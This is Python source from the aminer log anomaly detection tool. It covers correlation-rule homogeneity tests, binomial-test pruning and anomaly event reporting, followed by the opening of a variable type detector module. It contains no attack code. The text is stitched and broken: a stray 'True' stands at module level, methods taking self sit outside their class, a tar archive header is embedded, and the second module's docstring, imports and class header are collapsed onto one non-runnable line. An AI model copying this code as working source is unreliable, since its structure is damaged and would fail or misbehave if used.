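                            self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = self.w_rel_ht_results[event_index][
                                pos_var_cor_index][0][i_val][1:] + [1]
                        else:
                            self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = self.w_rel_ht_results[event_index][
                                pos_var_cor_index][0][i_val][1:] + [0]
                            failed_i_vals.append(i_val)

                    # Check correlations j=j_val -> i=i_val
                    for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]:
                        # States True after the following steps if all tests were positive, and False if at least one was negative
                        tmp_bool = True
                        if sum(current_appearance_list[pos_var_cor_index][1][j_val][i_val] for i_val in current_appearance_list[
                                pos_var_cor_index][1][j_val]) > self.min_values_cors_thres:
                            tmp_bool = self.homogeneity_test(self.w_rel_list[event_index][pos_var_cor_index][1][j_val],
                                                             current_appearance_list[pos_var_cor_index][1][j_val],
                                                             event_index, pos_var_cor_index, 1, j_val)

                        # Update the bt_results list
                        if tmp_bool:
                            self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = self.w_rel_ht_results[event_index][
                                pos_var_cor_index][1][j_val][1:] + [1]
                        else:
                            self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = self.w_rel_ht_results[event_index][
                                pos_var_cor_index][1][j_val][1:] + [0]
                            failed_j_vals.append(j_val)

                    if self.update_rules[event_index] and self.learn_mode:
                        # Print if new values have appeared in the correlation rules
                        message = f'New values appeared after the {self.event_type_detector.total_records}-th line in correlation(s) of ' \
                                  f'the event {self.event_type_detector.get_event_type(event_index)}'
                        confidence = 0
                        # Number of rules of both directions; every rule with new values adds 1 / total_correlations
                        total_correlations = len(self.w_rel_list[event_index][pos_var_cor_index][0]) + len(
                            self.w_rel_list[event_index][pos_var_cor_index][1])
                        sorted_log_lines = []
                        event_data = {'EventIndex': event_index}
                        affected_log_atom_paths = []
                        distribution_changes = []
                        for i_val in self.w_rel_list[event_index][pos_var_cor_index][0]:
                            if len(self.w_rel_list[event_index][pos_var_cor_index][0][i_val]) != len(current_appearance_list[
                                    pos_var_cor_index][0][i_val]):
                                if len(current_appearance_list[pos_var_cor_index][0][i_val]) / len(self.w_rel_list[event_index][
                                        pos_var_cor_index][0][i_val]) >= self.new_vals_alarm_thres:
                                    sorted_log_lines.append(  # skipcq: PYL-C0209
                                        'Alarm: New value occurred in correlation of the paths %s = %s -> %s =' % (
                                            self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][
                                                pos_var_cor_val[0]]], repr(i_val),
                                            self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][
                                                pos_var_cor_val[1]]]))
                                else:
                                    # skipcq: PYL-C0209
                                    sorted_log_lines.append('New value occurred in correlation of the paths %s = %s -> %s =' % (
                                        self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][
                                            pos_var_cor_val[0]]], repr(i_val),
                                        self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][
                                            pos_var_cor_val[1]]]))
                                affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][
                                    self.discrete_indices[event_index][pos_var_cor_val[0]]])
                                affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][
                                    self.discrete_indices[event_index][pos_var_cor_val[1]]])
                                distribution = {
                                    'OldDistribution': [[j_val, self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] / sum(
                                        self.w_rel_list[event_index][pos_var_cor_index][0][i_val].values())] for j_val in
                                        self.w_rel_list[event_index][pos_var_cor_index][0][i_val].keys()],
                                    'NewDistribution': [[j_val, current_appearance_list[pos_var_cor_index][0][i_val][j_val] / sum(
                                        current_appearance_list[pos_var_cor_index][0][i_val].values())] for j_val in
                                        current_appearance_list[pos_var_cor_index][0][i_val].keys()]
                                }
                                distribution_changes.append(distribution)
                                sorted_log_lines.append(f"Old distribution: {distribution['OldDistribution']}")
                                sorted_log_lines.append(f"New distribution: {distribution['NewDistribution']}")
                                confidence += 1 / total_correlations

                                # Add the new values to the correlation rule
                                for j_val in current_appearance_list[pos_var_cor_index][0][i_val].keys():
                                    if j_val not in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]:
                                        self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] = 0

                        for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]:
                            if len(self.w_rel_list[event_index][pos_var_cor_index][1][j_val]) != len(current_appearance_list[
                                    pos_var_cor_index][1][j_val]):
                                if len(current_appearance_list[pos_var_cor_index][1][j_val]) / len(self.w_rel_list[event_index][
                                        pos_var_cor_index][1][j_val]) >= self.new_vals_alarm_thres:
                                    # skipcq: PYL-C0209
                                    sorted_log_lines.append('Alarm: New value occurred in correlation of the paths %s = %s -> %s =' % (
                                        self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][
                                            pos_var_cor_val[1]]], repr(j_val),
                                        self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][
                                            pos_var_cor_val[0]]]))
                                else:
                                    # skipcq: PYL-C0209
                                    sorted_log_lines.append('New value occurred in correlation of the paths %s = %s -> %s =' % (
                                        self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][
                                            pos_var_cor_val[1]]], repr(j_val),
                                        self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][
                                            pos_var_cor_val[0]]]))
                                affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][
                                    self.discrete_indices[event_index][pos_var_cor_val[1]]])
                                affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][
                                    self.discrete_indices[event_index][pos_var_cor_val[0]]])
                                distribution = {
                                    'OldDistribution': [[i_val, self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] / sum(
                                        self.w_rel_list[event_index][pos_var_cor_index][1][j_val].values())] for i_val in
                                        self.w_rel_list[event_index][pos_var_cor_index][1][j_val].keys()],
                                    'NewDistribution': [[i_val, current_appearance_list[pos_var_cor_index][1][j_val][i_val] / sum(
                                        current_appearance_list[pos_var_cor_index][1][j_val].values())] for i_val in
                                        current_appearance_list[pos_var_cor_index][1][j_val].keys()]
                                }
                                distribution_changes.append(distribution)
                                sorted_log_lines.append(f"Old distribution: {distribution['OldDistribution']}")
                                sorted_log_lines.append(f"New distribution: {distribution['NewDistribution']}")
                                confidence += 1 / total_correlations

                                # Add the new values to the correlation rule
                                for i_val in current_appearance_list[pos_var_cor_index][1][j_val].keys():
                                    if i_val not in self.w_rel_list[event_index][pos_var_cor_index][1][j_val]:
                                        self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] = 0

                        if len(sorted_log_lines) != 0:
                            event_data['AffectedLogAtomPaths'] = list(set(affected_log_atom_paths))
                            event_data['DistributionChanges'] = distribution_changes
                            event_data['TypeInfo'] = {'Confidence': confidence}
                            # Pad to total_records lines so the event carries one line per record
                            sorted_log_lines += [''] * (self.event_type_detector.total_records - len(sorted_log_lines))
                            for listener in self.anomaly_event_handlers:
                                listener.receive_event(
                                    f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, self.log_atom, self)

                        # Remove the failed rules if it is an update step
                        # Binomial test and delete rules of the form i=i_val -> j=j_val
                        for i_val in failed_i_vals:
                            if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val]) < self.min_successes_bt:  # BT
                                self.print_failed_wrel_update(event_index, pos_var_cor_index, 0, i_val)
                                del self.w_rel_list[event_index][pos_var_cor_index][0][i_val]
                                del self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val]
                        # Binomial test and delete rules of the form j=j_val -> i=i_val
                        for j_val in failed_j_vals:
                            if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val]) < self.min_successes_bt:  # BT
                                self.print_failed_wrel_update(event_index, pos_var_cor_index, 1, j_val)
                                del self.w_rel_list[event_index][pos_var_cor_index][1][j_val]
                                del self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val]

                        # Update the distributions of the correlation rules, which succeeded the test above
                        # Update i=i_val -> j=j_val
                        for i_val in self.w_rel_list[event_index][pos_var_cor_index][0]:
                            if self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val][-1]:
                                for j_val in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]:
                                    self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] += current_appearance_list[
                                        pos_var_cor_index][0][i_val][j_val]
                        # Update j=j_val -> i=i_val
                        for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]:
                            if self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val][-1]:
                                for i_val in self.w_rel_list[event_index][pos_var_cor_index][1][j_val]:
                                    self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] += current_appearance_list[
                                        pos_var_cor_index][1][j_val][i_val]
                        if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None:
                            self.stop_learning_timestamp = self.log_atom.atom_time + self.stop_learning_no_anomaly_time
                    else:
                        # Print the rules, which failed the binomial test, and reset their test window
                        for i_val in failed_i_vals:
                            if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val]) < self.min_successes_bt:  # BT
                                self.print_failed_wrel_test(event_index, pos_var_cor_index, 0, i_val)
                                self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = [1] * self.num_bt
                                self.w_rel_confidences[event_index][pos_var_cor_index][0][i_val] = []
                        for j_val in failed_j_vals:
                            if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val]) < self.min_successes_bt:  # BT
                                self.print_failed_wrel_test(event_index, pos_var_cor_index, 1, j_val)
                                self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = [1] * self.num_bt
                                self.w_rel_confidences[event_index][pos_var_cor_index][1][j_val] = []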
    # skipcq: PYL-R0201
    def homogeneity_test(self, occurrences1, occurrences2, event_index, pos_var_cor_index, cor_direction, value1):
        """
        Run a two-sample test of homogeneity between the learned counts and the newly observed counts of one rule.

        The test is selected by used_homogeneity_test: 'Chi' sums a chi-square statistic over the keys of occurrences1 with a
        positive count and rejects if it reaches the (1 - alpha_chisquare_test) quantile of the chi-square distribution with
        len(occurrences1) - 1 degrees of freedom; 'MaxDist' rejects as soon as the relative frequency of one key of
        occurrences1 differs between the two samples by more than max_dist_rule_distr. Any other value accepts unconditionally.
        A rejection appends its statistic to w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1], which is
        then trimmed to the last num_bt - min_successes_bt + 1 entries.

        @param occurrences1 dict value -> learned count of the rule.
        @param occurrences2 dict value -> observed count; it is expected to hold every key of occurrences1 that is tested.
        @return True if the samples are considered homogeneous, False otherwise.
        """
        def remember_rejection(statistic):
            # Keep only the most recent statistics of rejected tests for this rule.
            kept = self.num_bt - self.min_successes_bt + 1
            slot = self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction]
            slot[value1].append(statistic)
            slot[value1] = slot[value1][-kept:]

        if self.used_homogeneity_test == 'Chi':
            total1 = sum(occurrences1.values())
            total2 = sum(occurrences2.values())
            statistic = 0
            for val, count1 in occurrences1.items():
                if count1 <= 0:
                    continue
                count2 = occurrences2[val]
                # Expected counts under the pooled distribution, one term per sample
                expected1 = total1 * (count1 + count2) / (total1 + total2)
                statistic += (count1 - expected1) * (count1 - expected1) / expected1
                expected2 = total2 * (count1 + count2) / (total1 + total2)
                statistic += (count2 - expected2) * (count2 - expected2) / expected2
            quantile = chi2.ppf(1 - self.alpha_chisquare_test, (len(occurrences1) - 1))
            if statistic >= quantile:
                remember_rejection(statistic)
                return False
        elif self.used_homogeneity_test == 'MaxDist':
            total1 = sum(occurrences1.values())
            total2 = max(1, sum(occurrences2.values()))
            for val, count1 in occurrences1.items():
                distance = abs(count1 / total1 - occurrences2[val] / total2)
                if distance > self.max_dist_rule_distr:
                    remember_rejection(distance)
                    return False
        return True
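True
# The methods below belong to the detector class declared earlier in this file (each takes
# ``self``); they were re-indented from a single collapsed line and de-duplicated into helpers.


# skipcq: PYL-R0201
def pick_cor_match_disc_distr(self, prob_list1, prob_list2):
    """
    Check whether two discrete distributions are similar enough to be correlation candidates.

    Both probability lists are compared after sorting them in descending order, so the
    comparison is between the largest probabilities regardless of the values they belong to.

    @param prob_list1 probabilities of the values of the first variable.
    @param prob_list2 probabilities of the values of the second variable.
    @return False as soon as one pair of sorted probabilities differs by more than
            self.match_disc_distr_threshold divided by the length of the longer list, True otherwise.
    """
    sorted1 = sorted(prob_list1, reverse=True)
    sorted2 = sorted(prob_list2, reverse=True)
    longest = max(len(sorted1), len(sorted2))
    # zip stops at the shorter list; the division only happens when at least one pair exists.
    for prob1, prob2 in zip(sorted1, sorted2):
        if abs(prob1 - prob2) > self.match_disc_distr_threshold / longest:
            return False
    return True


# skipcq: PYL-R0201
def pick_cor_exclude_due_distr(self, prob_list):
    """
    Check whether a discrete distribution is spread enough to be worth correlating.

    A variable whose most likely value already takes almost all of the probability mass carries
    too little information. epsilon interpolates between self.exclude_due_distr_lower_limit and 1
    depending on the number of values.

    @param prob_list probabilities of the values of the variable; must not be empty.
    @return True if no probability exceeds epsilon (possible correlation), False if the variable
            should be excluded.
    """
    lower_limit = self.exclude_due_distr_lower_limit
    epsilon = lower_limit + (1 - lower_limit) / len(prob_list)
    # not any(val > epsilon) keeps the exact comparison direction of the original loop.
    return not any(val > epsilon for val in prob_list)


# skipcq: PYL-R0201
def pick_cor_match_disc_vals(self, val_list1, val_list2):
    """
    Check whether two discrete variables share enough values to be correlation candidates.

    @param val_list1 values observed for the first variable.
    @param val_list2 values observed for the second variable.
    @return True if the number of entries of val_list1 that also occur in val_list2 exceeds
            self.match_disc_vals_sim_tresh times the size of the smaller list, False otherwise.
    """
    shared = sum(1 for val in val_list1 if val in val_list2)
    return shared > self.match_disc_vals_sim_tresh * min(len(val_list1), len(val_list2))


def pick_cor_random(self, event_index):
    """
    Pick random pairs of discrete variables of an event type as correlation candidates.

    The share self.percentage_random_cors of all n*(n-1)/2 variable pairs is returned. When the
    share is above 0.5 the complement is sampled instead and the remaining pairs are returned,
    which needs fewer random draws.

    @param event_index index of the event type in self.discrete_indices.
    @return list of [i, j] pairs with i < j; i and j index self.discrete_indices[event_index].
    """
    num_vars = len(self.discrete_indices[event_index])
    sample_complement = self.percentage_random_cors > 0.5
    # Keep the original multiplication order so the float rounding below behaves the same.
    if sample_complement:
        num_total = (1 - self.percentage_random_cors) * num_vars * (num_vars - 1) / 2
    else:
        num_total = self.percentage_random_cors * num_vars * (num_vars - 1) / 2
    # Round to the nearest integer; an exact .5 rounds down only when sampling the complement.
    fraction = round(num_total % 1., 4)
    if fraction < 0.5 or (fraction == 0.5 and self.percentage_random_cors >= 0.5):
        num_total = int(num_total)
    else:
        num_total = int(num_total + 1)
    picked = []
    seen = set()  # (min, max) tuples of the pairs in picked, for O(1) duplicate checks
    while len(picked) < num_total:
        draws = np.random.randint(0, num_vars, [num_total - len(picked), 2])
        for first, second in draws:
            if first == second:
                continue
            pair = (min(first, second), max(first, second))
            if pair not in seen:
                seen.add(pair)
                picked.append(list(pair))
    if not sample_complement:
        return picked
    # Return every pair that was not drawn.
    return [[i, j] for i in range(num_vars) for j in range(i + 1, num_vars) if (i, j) not in seen]


# skipcq: PYL-R0201
def check_cor_w_rel(self, probability_list, total_pos_val):
    """
    Check whether a list of conditional probabilities can still be a correlation.

    The relation is rejected when more than self.check_cor_thres * total_pos_val of the possible
    values occur on the right hand side and either too many values exist
    (total_pos_val > self.check_cor_num_thres) or the probabilities are nearly uniform
    (spread below self.check_cor_prob_thres times the mean).

    @param probability_list probabilities of the observed right hand side values; non-empty
           whenever the first condition holds.
    @param total_pos_val number of possible values of the right hand side variable.
    @return False if the relation is to be rejected, True if it may be a correlation.
    """
    if not self.check_cor_thres * total_pos_val < len(probability_list):
        return True
    if total_pos_val > self.check_cor_num_thres:
        return False
    spread = max(probability_list) - min(probability_list)
    mean = sum(probability_list) / len(probability_list)
    return not spread < self.check_cor_prob_thres * mean


def validate_cor(self):
    """Validate the found correlations and remove the ones which fail the configured requirements."""
    for meth in self.used_validate_cor_meth:
        if meth == 'coverVals':
            self.validate_cor_cover_vals()
        elif meth == 'distinctDistr':
            self.validate_cor_distinct_distr()


def _prune_low_coverage(self, cor_list):
    """
    Clear every rule direction in cor_list whose observations cover too few lines of the event type.

    @param cor_list self.rel_list or self.w_rel_list; cor_list[event_index][pair_index] is
           [dict i_val -> {j_val: count}, dict j_val -> {i_val: count}] and is modified in place.
    """
    for event_index, event_val in enumerate(cor_list):
        # Minimal number of observations a direction needs to keep its rules.
        required = self.event_type_detector.num_event_lines[event_index] * self.validate_cor_cover_vals_thres
        for pos_var_cor_index in range(len(self.pos_var_cor[event_index])):  # skipcq: PTC-W0060
            for direction in (0, 1):
                rules = event_val[pos_var_cor_index][direction]
                coverage = sum(sum(rules[lhs_val].values()) for lhs_val in rules)
                if coverage < required:
                    event_val[pos_var_cor_index][direction] = {}


def validate_cor_cover_vals(self):
    """
    Rate all found relations by the coverage of the values of the left hand side variable.

    Relations with a low coverage (less than num_event_lines * validate_cor_cover_vals_thres
    observations in a direction) are removed, as they cannot be considered real relations.
    """
    for meth in self.used_cor_meth:
        if meth == 'Rel':
            self._prune_low_coverage(self.rel_list)
        elif meth == 'WRel':
            self._prune_low_coverage(self.w_rel_list)


def _distribution_variance(self, rules, rhs_values):
    """
    Measure how much the right hand side distributions of a set of rules differ from each other.

    @param rules dict lhs_val -> {rhs_val: count} for one direction of a variable pair.
    @param rhs_values all possible values of the right hand side variable.
    @return the summed, frequency-weighted variance over rhs_values of the conditional distributions
            of the rules with more than self.min_values_cors_thres observations; 0.0 when no rule
            is frequent enough.
    """
    num_rhs = len(rhs_values)
    # distribution_list[k][r] is the conditional probability of rhs_values[k] under rule r.
    distribution_list = [[] for _ in range(num_rhs)]
    frequency_list = []  # number of observations of each kept rule
    for lhs_val in rules:
        counts = rules[lhs_val]
        frequency = sum(counts.values())
        if frequency <= self.min_values_cors_thres:
            continue
        frequency_list.append(frequency)
        for k, rhs_val in enumerate(rhs_values):
            distribution_list[k].append(counts[rhs_val] / frequency if rhs_val in counts else 0)
    total_frequency = max(1, sum(frequency_list))
    num_rules = len(frequency_list)
    mean_list = [sum(distribution_list[k][r] * frequency_list[r] for r in range(num_rules)) / total_frequency
                 for k in range(num_rhs)]
    variance_list = [sum((distribution_list[k][r] - mean_list[k]) ** 2 * frequency_list[r] / total_frequency
                         for r in range(num_rules)) for k in range(num_rhs)]
    return sum(variance_list)


def validate_cor_distinct_distr(self):
    """
    Compare the right hand sides of the found weighted relations.

    A direction of a variable pair is removed when the conditional distributions of its rules are
    too similar to each other (summed variance below self.validate_cor_distinct_thres), i.e. the
    right hand side does not depend on the left hand side value.
    """
    for meth in self.used_cor_meth:
        if meth != 'WRel':
            continue
        for event_index, event_val in enumerate(self.w_rel_list):
            for pos_var_cor_index, pos_var_cor_val in enumerate(self.pos_var_cor[event_index]):
                # Direction 0 is i = i_val -> j; the right hand side values are those of variable j.
                rhs_values = self.pos_var_val[event_index][pos_var_cor_val[1]]
                if self._distribution_variance(event_val[pos_var_cor_index][0], rhs_values) < self.validate_cor_distinct_thres:
                    event_val[pos_var_cor_index][0] = {}
                # Direction 1 is j = j_val -> i; the right hand side values are those of variable i.
                rhs_values = self.pos_var_val[event_index][pos_var_cor_val[0]]
                if self._distribution_variance(event_val[pos_var_cor_index][1], rhs_values) < self.validate_cor_distinct_thres:
                    event_val[pos_var_cor_index][1] = {}


def _collect_rule_lines(self, event_index, cor_list, weighted):
    """
    Render the rules of cor_list for one event type in both directions.

    @param event_index index of the event type.
    @param cor_list self.rel_list[event_index] or self.w_rel_list[event_index]: per variable pair a
           list [dict i_val -> {j_val: count}, dict j_val -> {i_val: count}].
    @param weighted if True the right hand side counts are divided by their sum (weighted
           relations), otherwise the raw counts are printed.
    @return tuple (log_lines, affected_paths, affected_values); each reported rule contributes two
            log lines, two paths (left, right) and two value entries.
    """
    key_list = self.event_type_detector.variable_key_list[event_index]
    discrete_indices = self.discrete_indices[event_index]
    log_lines = []
    affected_paths = []
    affected_values = []
    for pos_var_cor_index, pos_var_cor_val in enumerate(cor_list):
        if pos_var_cor_val == [{}, {}]:
            continue
        i = self.pos_var_cor[event_index][pos_var_cor_index][0]
        j = self.pos_var_cor[event_index][pos_var_cor_index][1]
        # Direction 0 reads "i = i_val -> j = ...", direction 1 the reverse.
        for direction, (lhs, rhs) in enumerate(((i, j), (j, i))):
            lhs_path = key_list[discrete_indices[lhs]]
            rhs_path = key_list[discrete_indices[rhs]]
            for lhs_val, counts in pos_var_cor_val[direction].items():
                # Only rules backed by more than min_values_cors_thres observations are reported.
                if len(counts) == 0 or sum(counts.values()) <= self.min_values_cors_thres:
                    continue
                total = sum(counts.values())
                if weighted:
                    rhs_entries = [[rhs_val, counts[rhs_val] / total] for rhs_val in counts.keys()]
                else:
                    rhs_entries = [[rhs_val, counts[rhs_val]] for rhs_val in counts.keys()]
                log_lines.append('x) VarPath %s = %s' % (lhs_path, repr(lhs_val)))  # skipcq: PYL-C0209
                log_lines.append(' ->VarPath %s = %s' % (rhs_path, rhs_entries))  # skipcq: PYL-C0209
                affected_paths.append(lhs_path)
                affected_paths.append(rhs_path)
                affected_values.append(repr(lhs_val))
                affected_values.append(rhs_entries)
    return log_lines, affected_paths, affected_values


def _emit_ini_message(self, event_index, message, log_lines, affected_paths, affected_values):
    """
    Send an initialisation event to all anomaly event handlers, unless no rule was rendered.

    @param event_index index of the event type.
    @param message event message built by the caller.
    @param log_lines rendered rule lines; padded with empty strings up to total_records.
    @param affected_paths parser paths of the reported rules (de-duplicated here).
    @param affected_values left hand side values and right hand side entries of the rules.
    """
    if len(log_lines) == 0:
        return
    event_data = {'EventIndex': event_index}
    event_data['AffectedLogAtomPaths'] = list(set(affected_paths))
    event_data['AffectedLogAtomValues'] = affected_values
    log_lines += [''] * (self.event_type_detector.total_records - len(log_lines))
    for listener in self.anomaly_event_handlers:
        listener.receive_event(f'Analysis.{self.__class__.__name__}', message, log_lines, event_data, self.log_atom, self)


def print_ini_rel(self, event_index):
    """
    Print the generated correlations for the method 'relations'.

    The rule count in the message includes every rule of a non-empty variable pair; the listed
    lines only contain rules with more than self.min_values_cors_thres observations.
    """
    rules = [pair for pair in self.rel_list[event_index] if pair != [{}, {}]]
    rule_count = sum(len(pair[0]) + len(pair[1]) for pair in rules)
    message = f'Initialisation of the method relations of the event {self.event_type_detector.get_event_type(event_index)}'
    message += '\n%s rules have been generated for this event type' % rule_count  # skipcq: PYL-C0209
    log_lines, affected_paths, affected_values = self._collect_rule_lines(event_index, self.rel_list[event_index], weighted=False)
    self._emit_ini_message(event_index, message, log_lines, affected_paths, affected_values)


def _count_supported_rules(self, rules):
    """
    Count the left hand side values of rules with non-empty right hand side counts summing above
    self.min_values_cors_thres.
    """
    return sum(1 for counts in rules.values() if len(counts) > 0 and sum(counts.values()) > self.min_values_cors_thres)


def print_ini_w_rel(self, event_index):
    """
    Print the generated correlations for the method 'weighted relations'.

    Both the rule count in the message and the listed lines use self.min_values_cors_thres as
    the minimal number of observations; the listing previously used a hard-coded 50, so the
    count and the lines disagreed whenever the threshold was configured differently.
    """
    rule_count = sum(self._count_supported_rules(pair[0]) + self._count_supported_rules(pair[1])
                     for pair in self.w_rel_list[event_index] if pair != [{}, {}])
    message = f'Initialisation of the method weighted relations of the event {self.event_type_detector.get_event_type(event_index)}'
    message += '\n%s rules have been generated for this event type' % rule_count  # skipcq: PYL-C0209
    log_lines, affected_paths, affected_values = self._collect_rule_lines(event_index, self.w_rel_list[event_index], weighted=True)
    self._emit_ini_message(event_index, message, log_lines, affected_paths, affected_values)


def _report_wrel_rejection(self, event_index, pos_var_cor_index, cor_direction, value1, message_template):
    """
    Send an event for a weighted relation that failed a test or update step.

    @param event_index index of the event type.
    @param pos_var_cor_index index of the variable pair in self.pos_var_cor[event_index].
    @param cor_direction 0 for i = value1 -> j, 1 for j = value1 -> i.
    @param value1 left hand side value of the relation.
    @param message_template %-format string taking (left path, left value, right path,
           right hand side distribution, total records) in this order.
    """
    cor_direction_neg = 0
    if cor_direction == 0:
        cor_direction_neg = 1
    key_list = self.event_type_detector.variable_key_list[event_index]
    discrete_indices = self.discrete_indices[event_index]
    pair = self.pos_var_cor[event_index][pos_var_cor_index]
    lhs_path = key_list[discrete_indices[pair[cor_direction]]]
    rhs_path = key_list[discrete_indices[pair[cor_direction_neg]]]
    counts = self.w_rel_list[event_index][pos_var_cor_index][cor_direction][value1]
    total = sum(counts.values())
    rhs_distribution = [[value2, counts[value2] / total] for value2 in counts.keys()]
    message = message_template % (  # skipcq: PYL-C0209
        lhs_path, repr(value1), rhs_path, rhs_distribution, self.event_type_detector.total_records)
    # NOTE(review): presumably at least one confidence has been recorded before this is called
    # (the test step appends before reporting) - an empty list would raise ZeroDivisionError.
    confidences = self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1]
    confidence = sum(confidences) / len(confidences)
    event_data = {'EventIndex': event_index}
    event_data['AffectedLogAtomPaths'] = list(set([lhs_path, rhs_path]))
    event_data['AffectedValues'] = [repr(value1), rhs_distribution]
    event_data['TypeInfo'] = {'Confidence': confidence}
    sorted_log_lines = [''] * self.event_type_detector.total_records
    for listener in self.anomaly_event_handlers:
        listener.receive_event(
            f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, self.log_atom, self)


def print_failed_wrel_test(self, event_index, pos_var_cor_index, cor_direction, value1):
    """Print the correlations which failed in a test step for the method 'weighted relations'."""
    self._report_wrel_rejection(
        event_index, pos_var_cor_index, cor_direction, value1,
        'Correlation of the paths %s = %s -> %s = %s would be rejected after the %s-th line')


def print_failed_wrel_update(self, event_index, pos_var_cor_index, cor_direction, value1):
    """Print the correlations which failed in an update step for the method 'weighted relations'."""
    self._report_wrel_rejection(
        event_index, pos_var_cor_index, cor_direction, value1,
        'Correlation of the target_path_list %s = %s -> %s = %s has been rejected after the %s-th line')


# skipcq: PYL-R0201
def bt_min_successes(self, num_BT, p, alpha):
    """
    Calculate the minimal number of successes for the binomial test with significance alpha.

    The tail probability P(successes >= k) of Bin(num_BT, p) is accumulated from k = num_BT
    downwards; the first k for which it exceeds alpha is returned.

    @param num_BT number of observed tests (non-negative).
    @param p probability of success of a single test.
    @param alpha significance level.
    @return the minimal number of successes, or 0 if the tail never exceeds alpha (alpha >= 1).
    @raise ValueError if num_BT is negative.
    """
    if num_BT < 0:
        raise ValueError('num_BT must be non-negative')
    tmp_sum = 0.0
    # Binomial coefficient C(num_BT, i), updated exactly in integer arithmetic. The previous
    # implementation used np.math.factorial, an alias that no longer exists in NumPy >= 1.25.
    coefficient = 1
    for i in range(num_BT + 1):
        if i > 0:
            coefficient = coefficient * (num_BT - i + 1) // i
        # Probability of exactly i failures, i.e. num_BT - i successes.
        tmp_sum = tmp_sum + coefficient * ((1 - p) ** i) * (p ** (num_BT - i))
        if tmp_sum > alpha:
            return num_BT - i
    return 0
VariableTypeDetector.py000066400000000000000000036363311437606560100354250ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis
"""This module defines a detector for variable type.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see <https://www.gnu.org/licenses/>.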
""" import numpy as np import copy from scipy.stats import kstest, ks_2samp, norm, multinomial, distributions, chisquare import os import logging import sys import time from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD,\ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil class VariableTypeDetector(AtomHandlerInterface, TimeTriggeredComponentInterface): """ This class tests each variable of the event_types for the implemented variable types. This module needs to run after the event type detector is initialized """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, event_type_detector, persistence_id='Default', target_path_list=None, used_gof_test='CM', gof_alpha=0.05, s_gof_alpha=0.05, s_gof_bt_alpha=0.05, d_alpha=0.1, d_bt_alpha=0.1, div_thres=0.3, sim_thres=0.1, indicator_thres=0.4, num_init=100, num_update=50, num_update_unq=200, num_s_gof_values=50, num_s_gof_bt=30, num_d_bt=30, num_pause_discrete=5, num_pause_others=2, test_gof_int=True, num_stop_update=False, silence_output_without_confidence=False, silence_output_except_indicator=True, num_var_type_hist_ref=10, num_update_var_type_hist_ref=10, num_var_type_considered_ind=10, num_stat_stop_update=200, num_updates_until_var_reduction=20, var_reduction_thres=0.6, num_skipped_ind_for_weights=1, num_ind_for_weights=100, used_multinomial_test='Chi', use_empiric_distr=True, used_range_test='MinMax', range_alpha=0.05, range_threshold=1, num_reinit_range=100, range_limits_factor=1, dw_alpha=0.05, save_statistics=True, output_logline=True, ignore_list=None, constraint_list=None, 
